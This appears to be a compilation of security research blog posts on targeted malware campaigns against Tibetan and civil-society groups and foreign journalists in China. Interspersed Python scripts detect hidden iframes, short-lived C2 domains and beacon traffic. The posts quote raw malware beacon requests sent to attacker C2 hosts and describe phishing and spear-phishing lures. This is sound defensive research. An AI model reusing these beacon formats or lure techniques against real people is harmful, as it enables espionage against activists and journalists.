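    # static iframes; script bodies are stripped so the same tag is not counted twice
    for im in IFRAME_RE.finditer(SCRIPT_RE.sub("", html)):
        candidates.append(("static", im.group(1), im.group(2)))

    findings = []
    for origin, tag, attr_text in candidates:
        attrs = parse_attrs(attr_text)
        src = attrs.get("src", "")
        host = urlparse(src).hostname  # None for relative URLs
        reasons = []
        if origin == "document.write":
            reasons.append("emitted via document.write")
        if is_tiny(attrs.get("width")) and is_tiny(attrs.get("height")):
            reasons.append("zero-size frame")
        if host and not same_site(host, site_host):
            reasons.append("third-party src host " + host)
        if tag != tag.lower():
            reasons.append("mixed-case tag name " + tag)
        if reasons:
            findings.append({"origin": origin, "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_PAGE, "www.64tianwang.com"):
        print(f["src"], "->", "; ".join(f["reasons"]))
```

Run against a saved copy of a page (or a periodic fetch of your own site), the check surfaces exactly the kind of tag described above while leaving the site’s own, normally sized iframes alone. A single reason is not proof of compromise; the combination of script-written, zero-sized and third-party is what should trigger a closer look.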

Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers renamed the directory used in the initial attack, “css”, to “cssbak” and began serving the Microsoft Office Web Components 0day from the “css” directory instead.18 Several versions of Microsoft Office were affected, and anyone visiting this malicious page could be compromised even if their security updates were current.19

The details for the malicious website are:

Name: rfsb.xicp.net
Address: 222.223.89.17
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting phishing pages posing as the login screens of a variety of Chinese or Chinese-language email providers, including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.

“Phishing” is a term that refers to the fraudulent use of legitimate-looking websites to entice a user into revealing sensitive information such as user names and passwords.20 In this case, the attackers appear to be particularly interested in compromising users of Chinese email providers.

If users attempt to login to their email account, the credentials are forwarded to various servers under the attackers’ control:

121.22.23.254
netname: UNICOM-HE
descr: China Unicom Hebei province network
descr: China Unicom
country: CN

124.237.109.234
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

121.22.28.29
netname: QHD-YIWANGKEJI
descr: CNC Group CHINA169 Hebei Province Network
country: CN

222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

The attackers use a script that first sends the submitted credentials to a server under their control and then redirects the user to the legitimate mail provider, so the victim sees nothing more than an apparently failed or repeated login.

In the case of QQ the attackers used malicious Flash files that connect out to a server under the attackers’ control.21

Interestingly, all the IP’s are in Hebei Province.

The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.22

Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.

This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.23

The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a “Petition for the Release of Tibetan Filmmaker Dhondup Wangchen” hosted on Facebook which is sponsored by Students for a Free Tibet. However, the email also contains a link to hxxp://dump.vicp.cc/groups/articles.asp?n=3 which loads the real petition along with a malicious frame.

Subject: Re: Petition for Tibetan filmmaker’s
Date: Wed, 29 Jul 2009 22:52:26 +0800
From: Tseten Samdup
To: tsetenfreetibet@gmail.com

Here is the petition launched by SFT.

http://apps.facebook.com/causes/petitions/26?m=bcb306a2&recruiter_id=58958974&_fb_noscript=1

They have already collected 27,660 signatures.
Please sign your name if you have not.

Tseden Samdup

> ———- Forwarded message ———-
> From: RSF ASIA
> Date: Wed, Jul 29, 2009 at 8:05 AM
> Subject: Petition for Tibetan filmmaker’s
> To: tsetenfreetibet@gmail.com
>
>
> Reporters Without Borders/Reporters sans frontières
>
> 29 July 2009
>
> CHINA – TIBET
> More than 13,000 signatures on petition for Tibetan filmmaker’s release
> http://www.rsf.org/More-than-13-000-signatures-on.html
>
> Reporters Without Borders has given the Chinese authorities a petition
> calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,
> who has been held since 23 March 2008 and is seriously ill with hepatitis B,
> which is not being properly treated. According to recent reports, he is now
> in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).
>
> At the time of his arrest, Wangchen was completing a documentary about Tibet
> that was shown to foreign journalists in Beijing during the Olympic Games.
> He may be tried on charges of “separatism”.
>
> “There is an urgent need for the competent authorities to heed the appeal
> made by thousands of citizens around the world on behalf of a man whose only
> crime was to have filmed interviews,” Reporters Without Borders said. “The
> government should take account of Dhondup Wangchen’s state of health and
> free him on humanitarian grounds.”
>
> Reporters Without Borders handed in the petition today to the Chinese
> embassy in Paris. It was signed by 13,941 people, who included Tibetans,
> Indians, westerners, and eight Australian parliamentarians. Wangchen’s wife,
> Lhamo Tso, who is a refugee in northern India, collected several thousand
> signatures with the help of the Tibet Post (www.thetibetpost.com).
>
> See Lhamo Tso’s campaign video:
> http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news
>
> Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is
> meanwhile being denied access to him. Li has been allowed to see him only once
> since the start of the year in April. Like many human rights lawyers in
> China, he is being harassed by the government, which is threatening to
> rescind his licence if he does not drop the case.
> Vincent Brossel
> Asia-Pacific Desk
> Reporters Without Borders
> 33 1 44 83 84 70
> asia@rsf.org

The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.24

This page loads “xp.swf” and drops “zjss.exe” onto the system, which attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (nothing is currently listening on port 8080). The same domain was used in a 2006 0day attack against Japanese word processing software.25

Also hosted on this site is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film “Leaving Fear Behind,” which Dhondup Wangchen directed.

In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.

The IP address for dump.vicp.cc is 210.56.60.132, which is assigned to:

netname: SUN-NETWORK
descr: Sun Network (Hong Kong) Limited
descr: Internet Service Provider in Hong Kong
country: HK

Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis.

In addition to the email that was released by Reporters Without Borders (RSF), a web page was also set up on the RSF web site highlighting the fact that more than 13,000 people had signed a petition to release Dhondup Wangchen. However, the page on the RSF web site contained the same links as the malicious email: both the legitimate Facebook petition by Students for a Free Tibet and the malicious link to dump.vicp.cc.26

RSF promptly removed the malicious link after being alerted.

Conclusion

Our findings indicate that civil society organizations are compromised and used as vehicles to deliver 0day exploits to others (e.g. via malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site – many of whom may be staff and supporters of the specific organization – are likely to be compromised.

We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.

The attackers leverage human rights issues as the context for malware distribution in what are commonly called “social engineering” attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website.

These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.

However, the questions of the attackers’ intent as well as responsibility for the attacks remain murky. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used, just like any other random target, as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights themed email in a social engineering attack might just be a convenient way to get people’s attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might be more easily enticed to click on such a link.

An alternative explanation is that the attackers are intent on targeting civil society and are developing, or have access to, 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society, and we are noticing an increasing level of contextual relevance in these attacks. Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contains fewer spelling and grammatical errors and exploits legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks may actually limit the total number of hosts compromised but provide the attackers with politically sensitive hosts.

While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is a public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto, and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.

2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf

3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf

4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210

8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219

9 http://isc.sans.org/diary.html?storyid=4177

10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0

11 http://isc.sans.org/diary.html?storyid=6739&rss

12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&emc=th&pagewanted=all

13 http://www.hrichina.org/public/contents/press?revision_id=147917&item_id=56408

14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html

15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/

16 The FCCC’s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp://www.nontopworld.com/mainpage.htm.

17 http://isc.sans.org/diary.html?storyid=6733

18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html

19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

20 http://en.wikipedia.org/wiki/Phishing

21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&type=swf

22 http://domain.oray.cn/#tab=free

23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm

24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html

25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0

26 The same page in the Google cache from a day earlier did not contain the malicious link.

“0day”: Civil Society and Cyber Security



Greg and I have put up a new post on the IWM and Malware Lab about 0day exploits and civil society organizations. It’s not about coordinated 0day attacks but rather some general trends and patterns that we’re seeing. We’re finding that the websites of civil society organizations are being used to push malware — usually through iframe injection — and that malware campaigns often leverage human rights related themes. Also, despite the fact that some attacks may be unintentional (e.g. mass iframe injection), the result is a situation in which civil society organizations are intimidated and their operations are disrupted. The key issues we identified are:

  • Civil society organizations are compromised and used as vehicles to deliver 0day exploits
  • Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
  • Attackers leverage human rights issues as the context for malware distribution
  • The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Hossein Derakhshan



Cyrus Farivar has posted a translation of a letter sent by Hossein’s father to Ayatollah Larijani. It has been almost a year since Hossein was arrested and still there have been no charges laid against him, his family has only been able to meet with him twice for a few minutes and they don’t know which institution is holding him.

GhostNet in Portugal



A new report from www.trusted.pt documents their investigation into GhostNet in Portugal. I’ve only been able to read it via Google translate but it seems very interesting. During the GhostNet investigation we found several Portuguese infections including:

  • Embassy of Portugal, Germany
  • Embassy of Portugal, France
  • Embassy of Portugal, Finland
  • CEGER, Management Center for the Electronic Government Network, Portugal

trusted.pt investigated further, found two control servers and gained access to the attackers’ admin interface:

In September 2009 it had full access to the two administration interfaces of “GhostNet, one on each controller. The administration interface is an application in php, rather crude but effective, at home we can see all computers that have taken place in these drivers, in this case were 730, from 67 countries The interface allows complete control over the infected machine. Through something like “modules” can be added to the infected machines new features such as keyloggers, trojans remote control in real time ( “GhostRAT”), execute remote commands, send and receive files, and view the files sent automatically by computers infected.

This is exactly what we found. However, trusted.pt was able to view the documents pilfered from the infected machines and provided this summary:

It was investigated and found to exist in “GhostNet” of 1.1 gigabytes of information from computers with IP addresses associated with the Ministry of Foreign Affairs – An. Pst Ambassador of Portugal in India – JPEG procedures for employees, including passage of visas was searched and found the existence of the “GhostNet” of 7.9 gigabytes of information from computers with IP addresses associated with the Ministry of Justice:

- Multiple files. pst ITIJ employees with diverse and sensitive.
- Documents describing the procedures, configurations, and topologies of the main services of the ministry of justice, including passwords (modules keylogger) for remote access to servers.
- Documents relating to the electoral process, action plans and contingency plans, descriptions of settings and network topology election, including any data source from the civilian governments, passwords, configuration of routers, switches and other equipment.
- Various. Pst files and passwords for employees of the Directorate General of Registration and Notary, which allow a total view of how the services work, including conservatories of civil status and property. Passwords for access to the applications used.
- In the Judiciary Police, including working procedures – Several technical information for the computer systems of courts and their applications (SITAF, habilus).
- Several files of cases that we think have been removed from computers officials or judges – Documents relating to the prosecutor.
- Computer Applications as Habilus.

In fact and in view of the files found concrete strip to the frightening conclusion that the spying by “GhostNet in Portugal was able to reach key bodies of the Portuguese as the courts, and there (and there?) A serious infection in various organisms containing valuable and sensitive information that should in theory is well protected. An attempt was made during the time it gained access to the two drivers “GhostNet” beyond the operating system hosting the interface, but you do not find any fault in it that we can make the most important information about the reasons and people behind this network of highly dangerous espionage, and our access was lost about 72 hours after first contact.

Very interesting stuff.

Russian Botnet Readme.txt



A recent Malware Lab investigation I’ve been working on led me to two interesting files on a Russian botnet:

I don’t know if these are well known or not, but they describe how to install the botnet backend as well as what’s been added between versions 1.0 and 6.0.

Here are the executables that were on the same server:

8.exe

http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683

http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

R23.exe

http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1255651763

http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

R31.exe

http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829

http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

Windows_Protector.exe

http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491

http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

Targeted Malware Attack on Foreign Correspondent’s based in China



By Nart Villeneuve and Greg Walton

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from “Pam ”, who claimed to be an editor with the Straits Times, with a PDF attachment containing malware. When opened, malicious code in the PDF exploits Adobe Reader and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.2 These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.3

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.4

Key Findings:

  • The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.
  • The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.
  • The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.
  • The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students, employees, and faculty at the National Central University.

The Pam Bourdon Email

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.5

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.6

The Pam Bourdon Attachment

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230
zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.7 In those cases, the malware attempted to connect to:

ihe1979.3322.org
ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.8 In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org
feng.pc-officer.com | 216.255.196.154
feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.
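The resolution behaviour described above (names that are dead most of the time and resolve only for short windows) is itself a signal worth tracking, because a one-off lookup at the wrong moment will simply report NXDOMAIN and the analyst moves on. The following script is an added example, not code from the original post or from the authors; it takes a log of periodic resolution attempts and flags names that resolve only briefly. The observation log is constructed for the example: the domain names and the answer IPs are those reported above, but the hours at which each name resolved are invented, and the “www.example.org” control line uses a documentation-range address.

```python
from collections import defaultdict


def _series(domain, total_hours, resolving_hours, ip):
    """Build (hour, domain, answer-or-None) rows for one name (constructed data)."""
    return [(h, domain, ip if h in resolving_hours else None) for h in range(total_hours)]


# Constructed hourly resolution log for the names discussed above. The IP
# answers are the ones reported in the post; the resolution windows are made up.
OBSERVATIONS = (
    _series("zwy2007.pc-officer.com", 24, range(3, 6), "210.240.85.250")
    + _series("menberservice.3322.org", 24, range(10, 13), "140.115.182.230")
    + _series("mail.amberice.com", 24, (), None)
    + _series("www.example.org", 24, range(0, 24), "192.0.2.10")
)


def resolution_profile(observations, max_window=6):
    """Summarise how each name resolved over the observation period and flag
    names that resolve only in short windows, as the C2 names in this post do."""
    by_domain = defaultdict(list)
    for hour, domain, answer in observations:
        by_domain[domain].append((hour, answer))

    profile = {}
    for domain, obs in by_domain.items():
        obs.sort()
        answers = [a for _, a in obs]
        resolved = [a for a in answers if a]
        # transitions between "resolves" and "does not resolve"
        flips = sum(1 for i in range(1, len(answers)) if bool(answers[i]) != bool(answers[i - 1]))
        # longest run of consecutive checks that returned an address
        longest = run = 0
        for a in answers:
            run = run + 1 if a else 0
            longest = max(longest, run)
        profile[domain] = {
            "checks": len(answers),
            "resolved": len(resolved),
            "ips": sorted(set(resolved)),
            "flips": flips,
            "longest_window": longest,
            # resolved at least once, but never for longer than max_window checks
            "intermittent": 0 < len(resolved) < len(answers) and longest <= max_window,
        }
    return profile


def intermittent_domains(observations, max_window=6):
    """Names whose resolution pattern matches the short-lived C2 behaviour."""
    prof = resolution_profile(observations, max_window)
    return sorted(d for d, p in prof.items() if p["intermittent"])


if __name__ == "__main__":
    for domain, p in resolution_profile(OBSERVATIONS).items():
        print(domain, p)
    print("intermittent:", intermittent_domains(OBSERVATIONS))
```

In practice the observation rows would come from a cron job that resolves the watch-listed names every hour (or from a passive DNS feed) and appends the answer; the point of keeping the history is that a name which resolved for three hours on a single day and to a university address is far more interesting than one that never resolves at all, and only the history makes that visible.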

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used by students and faculty to download anti-virus software.9 This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1
User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)
Host: menberservice.3322.org
Content-Length: 682
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_42

HTTP/1.1 200 OK
Date: Tue Sep 22 21:41:10 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.10 Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file extension]

where [random characters] string may look similar to:

* qRXycRXuwJ11749
* PqJNBkcPDm18630
* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report11 after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: oyd.3322.org
Content-Length: 46
Proxy-Connection: keep-alive
Pragma: no-cache
new_host_24

HTTP/1.1 200 OK
Date: Wed Oct 01 23:05:15 2008
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 44
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: mmwbzhij.meibu.com
Content-Length: 32
Proxy-Connection: keep-alive
Pragma: no-cache
.new_host_23

HTTP/1.1 200 OK
Date: Fri Apr 10 22:49:22 2009
Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)
Content-Length: 32
Content-Type: application/octet-stream
Proxy-Connection: keep-alive

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.12 The attackers have pointed these domains to IPs on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.
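The three captures above share a recognisable shape: a POST over a non-standard port to a dynamic-DNS name, a ten-letter random file name with a media or archive extension, a User-Agent claiming a three-part Mozilla/4.x.y version with MSIE 5.0.2, and a body that begins with new_host_. The following Python detector, added here as an example and not taken from the report, parses raw requests and counts those indicators. The sample requests are constructed copies of the captures shown above plus one benign request; the indicator names, the regular expressions and the threshold of three are my own choices, and the dynamic-DNS parent list contains only the two services named in the text.

```python
"""Added example (not from the report): flag HTTP requests that match the
beacon shape seen in the captures above. Indicator names, regexes and the
threshold are my own; the dynamic-DNS parents are the two named in the text."""
import re
from urllib.parse import urlsplit

DYNDNS_PARENTS = {"3322.org", "meibu.com"}
# Ten random letters, four or five digits, then a media/archive extension.
PATH_RE = re.compile(r"^/[A-Za-z]{10}\d{4,5}\.(rm|mov|mp3|pdf|rar)$")
# Three-part Mozilla/4 version with MSIE 5.0.2: not a real browser string.
UA_RE = re.compile(r"^Mozilla/4\.\d+\.\d+ \(compatible; MSIE 5\.0\.2; Win32\)$")
# Body opens with 'new_host_NN', sometimes preceded by one stray byte.
BODY_RE = re.compile(r"^.?new_host_\d+", re.S)

# Constructed copies of the three captures shown above, plus a benign POST.
SAMPLES = {
    "menberservice": (
        "POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1\n"
        "User-Agent: Mozilla/4.2.20 (compatible; MSIE 5.0.2; Win32)\n"
        "Host: menberservice.3322.org\nContent-Length: 682\n"
        "Proxy-Connection: keep-alive\nPragma: no-cache\n\n.new_host_42"
    ),
    "oyd": (
        "POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1\n"
        "User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)\n"
        "Host: oyd.3322.org\nContent-Length: 46\n"
        "Proxy-Connection: keep-alive\nPragma: no-cache\n\nnew_host_24"
    ),
    "mmwbzhij": (
        "POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1\n"
        "User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)\n"
        "Host: mmwbzhij.meibu.com\nContent-Length: 32\n"
        "Proxy-Connection: keep-alive\nPragma: no-cache\n\n.new_host_23"
    ),
    "benign": (
        "POST http://www.example.com/api/upload HTTP/1.1\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\n"
        "Host: www.example.com\nContent-Length: 5\n\nhello"
    ),
}


def parse_request(raw):
    """Split a raw proxy-style request into method, host, port, path,
    headers (lower-cased names) and body."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "host": url.hostname or headers.get("host", ""),
            "port": url.port, "path": url.path, "headers": headers, "body": body}


def parent_domain(host):
    """Registrable parent of a host name, e.g. oyd.3322.org -> 3322.org."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:])


def beacon_indicators(raw):
    """Names of the indicators a request triggers."""
    req = parse_request(raw)
    hits = []
    if req["method"] == "POST" and req["port"] not in (None, 80, 443):
        hits.append("post_to_nonstandard_port")
    if parent_domain(req["host"]) in DYNDNS_PARENTS:
        hits.append("dynamic_dns_host")
    if PATH_RE.match(req["path"]):
        hits.append("random_media_filename")
    if UA_RE.match(req["headers"].get("user-agent", "")):
        hits.append("msie_5_0_2_user_agent")
    if BODY_RE.match(req["body"]):
        hits.append("new_host_body")
    return hits


def is_beacon(raw, threshold=3):
    """Treat a request as a beacon once it trips at least threshold indicators."""
    return len(beacon_indicators(raw)) >= threshold


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:14s} beacon={is_beacon(raw)} {beacon_indicators(raw)}")
```

Requiring several weak indicators together is deliberate: dynamic-DNS hosts and non-standard ports are common in benign traffic, but a file name that is exactly ten letters and four or five digits with a media extension, sent by a browser version that never existed, rarely is. If the attackers change any single element, the remaining indicators still carry the match.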

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

